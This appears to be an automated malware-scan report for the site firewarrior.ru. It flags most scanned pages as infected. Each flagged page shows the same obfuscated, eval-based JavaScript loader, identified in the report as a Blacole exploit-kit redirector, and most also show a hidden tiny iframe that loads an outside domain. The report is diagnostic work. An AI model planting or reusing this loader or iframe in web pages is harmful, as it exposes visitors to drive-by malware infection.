Malware Scanner report for firewarrior.ru

Malicious/Suspicious/Total urls checked: 14/0/15

14 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "firewarrior.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/13/13

13 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=firewarrior.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.firewarrior.ru/	200 OK Content-Length: 26435 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH
http://adv.rtelekom.net/adx.js	200 OK Content-Length: 73 Content-Type: application/javascript	clean
http://www.firewarrior.ru/history.html	200 OK Content-Length: 16124 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/tecnics.html	200 OK Content-Length: 14185 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/tecnics/acl.html	200 OK Content-Length: 13823 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/tecnics/abr.html	200 OK Content-Length: 15459 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/tecnics/433.html	200 OK Content-Length: 15134 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/tecnics/130.html	200 OK Content-Length: 15136 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/tecnics/131.html	200 OK Content-Length: 15133 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/arms.html	200 OK Content-Length: 16636 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/arms/bop.html	200 OK Content-Length: 15256 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/arms/barrels.html	200 OK Content-Length: 15469 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/arms/watr.html	200 OK Content-Length: 12429 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/arms/sleeve.html	200 OK Content-Length: 12870 Content-Type: text/html	malicious
